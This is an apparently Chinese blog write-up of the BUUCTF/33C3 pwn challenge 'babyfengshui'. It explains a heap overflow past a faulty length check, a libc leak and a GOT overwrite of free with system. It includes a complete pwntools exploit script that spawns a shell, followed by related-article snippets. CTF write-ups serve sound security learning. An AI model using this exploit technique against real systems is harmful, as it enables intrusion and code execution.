buuctf-babyfengshui_33c3_2016

最新推荐文章于 2023-09-19 21:15:21 发布
最新推荐文章于 2023-09-19 21:15:21 发布
阅读量715 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48807177/article/details/124571095
版权
本文详细分析了一段Ubuntu 16.04 32位环境下关于堆溢出漏洞的利用过程,涉及堆管理、内存布局、栈保护机制以及libc库函数的利用。通过修改free_got表的地址为system函数地址,实现了在执行free操作时调用system('/bin/sh'),从而获取shell。文章通过实例展示了漏洞利用的步骤,包括添加、删除、更新堆块,泄露libc基址,以及构造payload。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ubuntu16

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)        //没开

基本就这里有点问题

 if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 )
而重点则是在edit函数中,首先是让用户可以随意输入text的大小,但是该大小却受if ( (v3 + **(&ptr + a1)) >= *(&ptr + a1) - 4 )的影响也就是超出存储在之前结构体中text的大小时则会退出。

创建三个堆看一下布局

 在chunk0的指针

现在将free的地址改写为system的地址

 

我看是会创建两个堆块一个堆块是储存数据一个堆块储存姓名的
上面看到了update在判断长度的时候存在问题,
看堆布局以chunk0来说,判断条件就是:`0x08be7000+0x80>=0x08be7008`
因为我free掉一个index0的就相当于把创建的name和text的内容的堆都free(0x88+0x88)
但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能
我们将free掉index0号堆然后重新申请0x100,就可以使他chunk-name和chunk-text不相邻,这样我们chunk-text就可以输入任意大小的数据

 

这样从申请的chunk-text溢出到chunk1的堆块的

 

hex(0x87311a0-0x8731000)-0x8 //这个我猜的,真实情况下还是一个个慢慢填调吧!

泄漏的libc来计算基地址,计算出getshell函数

p.recvuntil("description: ")
free_addr=u32(p.recv(4))
print hex(free_addr)
libc_addr=free_addr-libc.symbols['free']
system=libc_addr+libc.symbols['system']

我们之前往chunk2中写入了’/bin/sh‘,现在将free的地址改写为system的地址,这样在执行free(chunk2)的时候就变成了执行system(’/bin/sh’)这样就可以获取shell了

update(1,0x8,p32(system))
delete(2)
p.interactive()

exp:

from pwn import *
context.log_level='debug'
p=process('./babyfengshui_33c3_2016')
elf=ELF('./babyfengshui_33c3_2016')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
free_got=elf.got['free']
​
def add(size,name,length,text):
    p.recvuntil("Action: ")
    p.sendline("0")
    p.sendlineafter("size of description: ",str(size))
    p.sendlineafter("name: ",name)
    p.recvuntil("text length:")
    p.sendline(str(length))
    p.recvuntil("text:")
    p.sendline(text)
def delete(index):
    p.recvuntil("Action: ")
    p.sendline("1")
    p.recvuntil("index: ")
    p.sendline(str(index))
def show(index):
    p.recvuntil("Action: ")
    p.sendline("2")
    p.recvuntil("index: ")
    p.sendline(str(index))
def update(index,length,text):
    p.recvuntil("Action: ")
    p.sendline("3")
    p.recvuntil("index: ")
    p.sendline(str(index))
    p.recvuntil("text length: ")
    p.sendline(str(length))
    p.recvuntil("text: ")
    p.sendline(text)
​
add(0x80,"nam1",0x80,"aaaa")
add(0x80,"nam2",0x80,"bbbb")
add(0x80,"nam3",0x80,"/bin/sh\x00")
delete(0)
​
add(0x100,'nam1',0x100,"cccc")
payload='a'*0x108+'a'*0x8+'a'*0x80+'a'*0x8+p32(free_got)
update(3,0x200,payload)
show(1)
p.recvuntil("description: ")
free_addr=u32(p.recv(4))
print hex(free_addr)
libc_addr=free_addr-libc.symbols['free']
system=libc_addr+libc.symbols['system']
print hex(system)
update(1,0x8,p32(system))
delete(2)
p.interactive()

总结:

看他上面的特性来说就是,他将你前面的free的堆块大小,正好被申请抢光了,他会到堆块的最后面申请空间

我还是懵的,为什么最后一步修改free_got表的地址可以这样来达到getshell,我还是迷迷糊糊的,改天逮一个师傅来!现在将free的地址改写为system的地址现在将free的地址改写为system的地址

BUUCTF pwn babyfengshui_33c3_2016(简单堆)
菜的只能随便写写博客
02-17 2131
0x01 文件分析   0x02 运行  程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。   0x03 静态分析 主函数: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
最新发布
2301_79326813的博客
01-24 765
又是一道堆题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建堆块,free释放堆块,show查看堆块内容,fill填充堆块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出必须要 我们输入的字节大小+堆块地址
[BUUCTF]PWN——babyfengshui_33c3_2016
mcmuyanga的博客
01-02 748
babyfengshui_33c3_2016 附件 步骤: 例行检查,32位程序,开启了cannary和nx 本地运行一下看看大概的情况,熟悉的堆的菜单布局 32位ida载入,看main函数 add update delete display 上面看到了update在判断长度的时候存在问题,它的长度判断根据是:以chunk0来说,以chunk0的地址加上chunk0的长度是否等于chunk0name的地址来判断的,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的
buuctf babyfengshui_33c3_2016
weixin_45677731的博客
08-19 468
这是四个主要的函数: add函数: add函数的输入部分: 同时,这也是update函数,其实这个函数是有溢出的漏洞的,它对于长度的检查是有问题的,后面就会利用到这一点 delete函数: display函数: 先随意创建几个chunk,看看布局, add(0x80,"nam1",0x80,"aaaa") add(0x80,"nam2",0x80,"bbbb") add(0x80,"nam3",0x80,"cccc") 以第一个为例,储存text的chunk在前,后面是储存name的chunk,
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 378
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
【CTF】【PWN】胎教向babyfengshui_33c3_2016题解
m0_50819561的博客
10-12 357
跳过checksec,我们直接分析程序。 我这里把这些函数命名为add,delete,display,edit。 先看add。 就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。 然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。 可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。 其中name
robomongo-0.9.0-rc10-windows-x86_64
10-31
根据压缩包子文件的文件名称"robomongo-0.9.0-rc10-windows-x86_64-33c89ea.exe",我们可以推断这个文件是RoboMongo的安装程序,后缀".exe"表明它是Windows平台下的可执行文件,而"33c89ea"可能是这个特定构建的唯一...
robomongo-0.9.0-darwin-x86_64-0786489.dmg。下载
01-05
官网下的太慢了,而且容易出错导致安装包打不开,好不容易下载下来完整能用的。
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 492
buu日常一题
babyfengshui_33c3_2016
qq_33590156的博客
08-04 190
利用堆申请机制绕过溢出检查,关键点在edit中,后指针小于前指针则满足条件,但是如果将后指针挤到后面去,则可以溢出。 from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote("node3.buuoj.cn",29869) #ms = process("./33c3") elf = ELF("./33c3") def add(size,name,l
babyfengshui_33c3_2016的wp
wuyvle的博客
03-05 206
这是个相当好的堆题 add函数 可以看出这是个结构体 struct Node{ char * description; char name[0x7C]; } s便是description的空间地址,而v2则是结构体的空间。 delete函数 display update 这里限制了输入的长度 对于chunk0来说,就是0x80c008+输入长度是否大于0x804c08c,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能 add(0x8
babyfengshui_33c3_2016 -- house of spirit
huzai9527的博客
03-17 147
本题主要就是看懂一条判断溢出的if语句 结构体是怎么看出来的 代码上看 struct{ char *text; char name[124]; } 从内存上看 思路 step4 的关于408哪里来的 看内存地址,计算chunk3的content到chunk1的struct即可 exp from pwn import * p = remote('node3.buuoj.cn',29853) #p = process('./babyfengshui_33c3_20
babyfengshui_33c3_2016题解
coco的博客
12-09 957
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
babyfengshui__BUUCTF
Jc
09-29 628
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
(攻防世界)(pwn)babyfengshui
PLpa的博客
08-03 1357
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NXCanary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
x_ctf_b0verfl0w
qq_62887641的博客
09-19 208
32位,保护全关,写shellcode栈溢出并且有个hit给出了jmp esp。
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2457
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
Python开发的33C3现金出纳系统:票务兑换与销售
标题和描述共同介绍了Python开发的一个特定用途系统——c6sh,这是一个用于在33C3(即第33届Chaos Communication Congress,一个著名的黑客大会)中兑换预订票和卖票的现金出纳机系统。我们可以从中提炼出以下几个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值